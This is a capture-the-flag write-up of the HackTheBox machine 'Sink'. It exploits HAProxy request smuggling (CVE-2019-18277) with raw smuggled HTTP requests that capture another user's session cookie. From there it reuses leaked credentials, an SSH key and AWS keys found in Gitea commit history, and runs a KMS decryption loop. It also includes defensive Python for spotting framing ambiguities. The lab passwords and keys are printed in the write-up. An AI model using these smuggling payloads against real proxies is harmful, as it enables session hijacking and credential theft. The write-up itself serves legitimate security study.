0x00 Topic introduction

Sink is a Linux machine on HackTheBox rated insane difficulty. It took me a long time; it was my first insane box on HackTheBox and I learned a lot from it, so I am sharing the process here.


The topic mainly involves the knowledge of:

HAProxy HTTP request smuggling (CVE-2019-18277)
Git commit log
AWS CLI configuration

0x01 Port Scan

└─# nmap -sC -sV -oA sink 10.129.71.3
Starting Nmap ( https://nmap.org ) at 2021-07-06 00:00 CST
Nmap scan report for 10.129.71.3
Host is up.
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
3000/tcp open  ppp?
| fingerprint-strings:
|   GenericLines, Help:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=7d01b54d4b74326b; Path=/; HttpOnly
|     Set-Cookie: _csrf=fzBuPyYXciKNMjoU74_PH6UmsMU6MTYyNTUwMDg1NzUxOTkyOTA4OQ; Path=/; Expires=Tue, 06 Jul 2021 16:00:57 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Mon, 05 Jul 2021 16:00:57 GMT
|   HTTPOptions:
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=5a24776cc4ce15ce; Path=/; HttpOnly
|     Set-Cookie: _csrf=Naj5fDxJz0wmhymfl7zrTjDvfrI6MTYyNTUwMDg2NDgyNDg1NDY3MQ; Path=/; Expires=Tue, 06 Jul 2021 16:01:04 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Mon, 05 Jul 2021 16:01:04 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Page Not Found - Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|_    <meta name="description" content="Gitea (Git with a c
5000/tcp open  http    Gunicorn 20.0.0
|_http-server-header: Gunicorn/20.0.0
|_http-title: Sink

The main open ports are 3000 and 5000: port 3000 serves Gitea and port 5000 serves a Gunicorn-backed web application. The site on port 3000 requires a login and we have no credentials yet, so we start with the site on port 5000.

0x02 Port 5000 – Gunicorn

The site on port 5000 allows account registration, so first register a user, log in, and capture the traffic.

The captured response headers reveal haproxy and gunicorn.

After logging in, the page allows posting comments. A Google search turns up an HTTP request smuggling vulnerability in HAProxy (CVE-2019-18277). By constructing a special comment request that smuggles a second request, private information from HTTP requests sent by other users can be captured.

HAProxy HTTP request smuggling (CVE-2019-18277)

HAProxy mishandles the Transfer-Encoding and Content-Length request headers. If a request carries both Transfer-Encoding and Content-Length, and a \x0b or \x0c character is inserted before the chunked value of Transfer-Encoding, HAProxy fails to recognise the chunked encoding, frames the body by Content-Length, and mistakenly forwards the request to the backend with both headers intact. The backend then parses the request as chunked and terminates it as soon as it sees the 0\r\n\r\n terminator, so any remaining bytes are treated as the start of the next request on the reused backend connection.

Request sent to HAProxy:

POST / HTTP/1.1
Host: 127.0.0.1:1080
Content-Length: 6
Transfer-Encoding:[\x0b]chunked

0

X

Requests sent to back-end processing:

POST / HTTP/1.1
Host: 127.0.0.1:1080
Content-Length: 6
Transfer-Encoding: chunked
X-Forwarded-For: 172.21.0.1

0

X

This requires http-reuse always to be set in the HAProxy configuration and Connection: keep-alive to be set in the request headers when the request is sent, so that the backend connection is shared between requests.
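The parser disagreement described above is something a reverse proxy or WAF can check for before a request is forwarded. The following is an added example (not code from the box or from HAProxy) of a small request-head audit: it parses the raw request with a parser that deliberately keeps control characters in header values, and reports the framing ambiguities that make two parsers disagree, such as Transfer-Encoding and Content-Length appearing together, or a control character in front of chunked. The two sample requests are constructed, modelled on the PoC above; the function names are my own.

```python
import re
from typing import List, Tuple

# tchar from RFC 7230 section 3.2.6: the only characters allowed in a
# Transfer-Encoding token such as "chunked"
_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def parse_head(raw: bytes) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw request into its request line and (name, value) header pairs.
    Names are lower-cased. Values are stripped of spaces and tabs only, so that
    control characters such as \\x0b and \\x0c survive for the audit (a plain
    str.strip() would silently discard them and hide the problem)."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip(" \t")))
    return lines[0], headers


def audit_framing(raw: bytes) -> List[str]:
    """Return findings describing why a front-end and a back-end parser could
    disagree on where this request's body ends. Empty list: framing is clean."""
    _, headers = parse_head(raw)
    te = [v for n, v in headers if n == "transfer-encoding"]
    cl = [v for n, v in headers if n == "content-length"]
    findings = []
    if te and cl:
        findings.append("both Transfer-Encoding and Content-Length are present")
    if len(cl) > 1:
        findings.append("multiple Content-Length headers")
    for v in cl:
        if not v.isdigit():
            findings.append("Content-Length is not a plain decimal number")
    for v in te:
        if any(ord(c) < 0x20 or ord(c) == 0x7F for c in v):
            findings.append("Transfer-Encoding contains a control character "
                            "(the CVE-2019-18277 trigger)")
        elif not all(_TOKEN.match(p.strip()) for p in v.split(",")):
            findings.append("Transfer-Encoding is not a valid token list")
    return findings


# Constructed sample modelled on the PoC request above (not a capture)
SMUGGLE_SAMPLE = (
    b"POST / HTTP/1.1\r\n"
    b"Host: 127.0.0.1:1080\r\n"
    b"Content-Length: 6\r\n"
    b"Transfer-Encoding:\x0bchunked\r\n"
    b"\r\n"
    b"0\r\n\r\nX"
)

# Constructed well-formed request for comparison
CLEAN_SAMPLE = (
    b"POST / HTTP/1.1\r\n"
    b"Host: 127.0.0.1:1080\r\n"
    b"Content-Length: 6\r\n"
    b"\r\n"
    b"msg=hi"
)

if __name__ == "__main__":
    for label, req in (("smuggle", SMUGGLE_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(label, audit_framing(req) or ["no findings"])
```

The safe handling for a proxy that sees any of these findings is to reject the request with 400 rather than normalise it, because normalising is exactly what HAProxy got wrong here; the check also catches the broader class (duplicate or non-numeric Content-Length, malformed Transfer-Encoding), not only the \x0b variant used on this box.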

Admin cookie theft

Using the HAProxy request smuggling vulnerability above: if another user sends a request after our malicious one, the smuggled request is completed by the beginning of that user's request, and the site stores the combined data as a comment. When we view that comment, we obtain the private information from the user's request.

We construct the request in Burp Repeater:

POST /comment HTTP/1.1
Host: 10.129.71.3:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Origin: http://10.129.71.3:5000
Connection: keep-alive
Referer: http://10.129.71.3:5000/home
Cookie: lang=en-US; i_like_gitea=ec51054dc539d89a; session=eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ.YO2r8w.8rq5TXqG7LkEYJV3cqVwOBTIh7o; _csrf=cQKWFLPhRfTeyypUg38t8RbxoUY6MTYyNjE4ODM1OTEzNDc4OTczMw
Upgrade-Insecure-Requests: 1
Transfer-Encoding: Cwo=chunked

5
msg=test
0

POST /comment HTTP/1.1
Host: 10.129.71.3:5000
Cookie: lang=en-US; i_like_gitea=ec51054dc539d89a; session=eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ.YO2r8w.8rq5TXqG7LkEYJV3cqVwOBTIh7o; _csrf=cQKWFLPhRfTeyypUg38t8RbxoUY6MTYyNjE4ODM1OTEzNDc4OTczMw
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Connection: keep-alive

msg=

The second POST request is our smuggled request. Because we need a \x0b in front of the chunked value of Transfer-Encoding, we first type Cwo= and then press Ctrl+Shift+B in Burp (base64 decode) to turn it into the raw byte. Alternatively, insert [\x0b] directly in Burp. After sending, a new comment appears in the comment section containing the cookie of another user.

Using Cookie Editor, replace our session cookie with the captured one to obtain the permissions of the [[email protected]](mailto:[email protected]) user.

Credentials

The credentials are found in three parts under Notes:

Chef Login : http://chef.sink.htb
Username : chefadm
Password : /6'fEGC&zEx{4]zz

Dev Node URL : http://code.sink.htb
Username : root
Password : FaH@3L>Z3})zzfQ3

Nagios URL : https://nagios.sink.htb
Username : nagios_adm
Password : g8<H6GK\{*L.fB3C

0x03 Port 3000 – Gitea

The credentials root / FaH@3L>Z3})zzfQ3 successfully log in to Gitea on port 3000:

Gitea is a self-hosted Git code hosting platform. Looking through the main repositories, some secret key information was found in Key Management.

It turns out to be an SSH private key committed by the user marcus.

User - marcus

Copy the private key to the local machine and change its permissions to 600. Connecting over SSH as user marcus with this key succeeds.

ls shows user.txt in the current directory, giving the first flag.

0x04 Privilege Escalation

Key Management shows some AWS operations. In Log Management, a commit by marcus was found that deleted the key and secret of an AWS-related configuration.

Following the commit history, the code containing the previously committed configuration is found:

<?php
require 'vendor/autoload.php';

use Aws\CloudWatchLogs\CloudWatchLogsClient;
use Aws\Exception\AwsException;

$client = new CloudWatchLogsClient([
    'region' => 'eu',
    'endpoint' => 'http://127.0.0.1:4566',
    'credentials' => [
        'key' => 'AKIAIUEN3QWCPSTEITJQ',
        'secret' => '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'
    ],
    'version' => 'latest'
]);

try {
    $client->createLogGroup(array(
        'logGroupName' => 'Chef_Events',
    ));
} catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}

try {
    $client->createLogStream([
        'logGroupName' => 'Chef_Events',
        'logStreamName' => '20201120'
    ]);
} catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}
?>

AWS CLI Configure

After googling AWS key and secret, I found the relevant introduction in the official guide: with an access key and secret, the AWS CLI can be configured to access the account's secrets. The official guidelines are as follows:

Docs.aws.amazon.com/cli/latest/…

Docs.aws.amazon.com/cli/latest/…

We follow the official instructions for the configuration; only the key and secret need to be filled in. The region field is the AWS region, which is set to the official default:

marcus@sink:~$ aws configure
AWS Access Key ID [None]: AKIAIUEN3QWCPSTEITJQ
AWS Secret Access Key [None]: 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
Default region name [None]: us-west-2
Default output format [None]: json


AWS Secrets Manager

After the configuration is complete, Secrets Manager can be used to list the stored secrets:

aws --endpoint-url="http://127.0.0.1:4566/" secretsmanager list-secrets

Then query each secret from the list one by one by its id:

aws --endpoint-url="http://127.0.0.1:4566/" secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:xxxxxxx<name>"

The following is obtained:

username:[email protected]
password:EALB=bcC=`a7f2#k

username:[email protected]
password:Welcome123!

username:[email protected]
password:R);\\)ShS99mZ~8j

User - david

Looking at /etc/passwd and /home shows that a user david exists, and one of the recovered passwords successfully switches to the david user.

0x05 AWS Key Management

servers.enc

In the david user's directory /home/david/Projects/Prod_Deployment there is a servers.enc file, which obviously needs to be decrypted.

Since the directory is related to the Gitea project, it is likely decrypted through AWS. Searching turned up AWS Key Management Service (KMS):

Docs.aws.amazon.com/kms/latest/…

Docs.aws.amazon.com/kms/latest/…

list-keys

Configure the AWS CLI for the david user the same way as before. After configuration, list-keys can be used:

aws --endpoint-url="http://127.0.0.1:4566/" kms list-keys

decrypt

The following bash script enables each listed key in turn and tries to decrypt servers.enc with it:

#!/bin/bash
# Collect every KeyId from list-keys, then enable each key and attempt the decrypt
for key in $(aws --endpoint-url="http://127.0.0.1:4566/" kms list-keys | grep KeyId | awk -F\" '{print $4}'); do
    aws --endpoint-url="http://127.0.0.1:4566/" kms enable-key --key-id "${key}"
    aws --endpoint-url="http://127.0.0.1:4566/" kms decrypt --key-id "${key}" --ciphertext-blob "fileb:///home/david/Projects/Prod_Deployment/servers.enc" --encryption-algorithm "RSAES_OAEP_SHA_256" --output "text" --query "Plaintext"
done

This returns a base64 string. I recommend CyberChef for decoding it; simply drag in the modules you need, which is very convenient:

gchq.github.io/CyberChef/

After base64 decoding, the output still needs to be unpacked with gunzip to obtain the final credentials:

name: admin
pass: _uezduQ!EY5AHfe2
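The grep/awk pipeline in the script above and the manual base64-then-gunzip step in CyberChef both work, but they are fragile: awk depends on the JSON field order and gunzip only applies if the plaintext happens to be gzipped. As an added example (not code from the box or from the AWS CLI), the Python below parses the list-keys response as JSON and decodes a `--query Plaintext --output text` result, unpacking it only when the gzip magic bytes are present. The list-keys JSON, the key ids and the credential text are all constructed samples; the function names are my own.

```python
import base64
import gzip
import json
from typing import Dict, List

# Constructed sample of `aws kms list-keys` output (account and ids are dummies)
SAMPLE_LIST_KEYS = json.dumps({
    "Keys": [
        {"KeyId": "00000000-0000-0000-0000-000000000001",
         "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/00000000-0000-0000-0000-000000000001"},
        {"KeyId": "00000000-0000-0000-0000-000000000002",
         "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/00000000-0000-0000-0000-000000000002"},
    ]
})


def extract_key_ids(list_keys_json: str) -> List[str]:
    """Read KeyId values from the list-keys JSON instead of grep/awk, so field
    order and whitespace in the CLI output do not matter."""
    data = json.loads(list_keys_json)
    return [k["KeyId"] for k in data.get("Keys", [])]


def decode_plaintext(b64_plaintext: str) -> bytes:
    """`kms decrypt --query Plaintext --output text` prints base64. The decoded
    bytes may themselves be a gzip stream (as on this box), so unpack only when
    the 1f 8b gzip magic is present and return the raw bytes otherwise."""
    raw = base64.b64decode(b64_plaintext)
    if raw[:2] == b"\x1f\x8b":
        raw = gzip.decompress(raw)
    return raw


def parse_credentials(text: str) -> Dict[str, str]:
    """Turn 'name: x' / 'pass: y' lines into a dict; lines without ':' are skipped."""
    out = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            out[key.strip()] = value.strip()
    return out


def make_sample_blob(text: str) -> str:
    """Build a gzip+base64 blob of the same shape the decrypt call returned
    (constructed for the demo; the real ciphertext is not reproduced here)."""
    return base64.b64encode(gzip.compress(text.encode())).decode()


if __name__ == "__main__":
    print(extract_key_ids(SAMPLE_LIST_KEYS))
    blob = make_sample_blob("name: admin\npass: placeholder-password\n")
    print(parse_credentials(decode_plaintext(blob).decode()))
```

Feeding the real decrypt output into decode_plaintext replaces the CyberChef step; the gzip check means the same function also handles keys whose plaintext is not compressed.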

done!

Conclusion

Overall, this machine mainly involves HTTP request smuggling in HAProxy (CVE-2019-18277), information leakage through Gitea commit history, AWS CLI configuration, AWS Key Management Service and related topics. If you have not worked with AWS before, this box is a good way to get familiar with it. HTTP request smuggling is demanding, but it is a practical attack technique and deserves further study.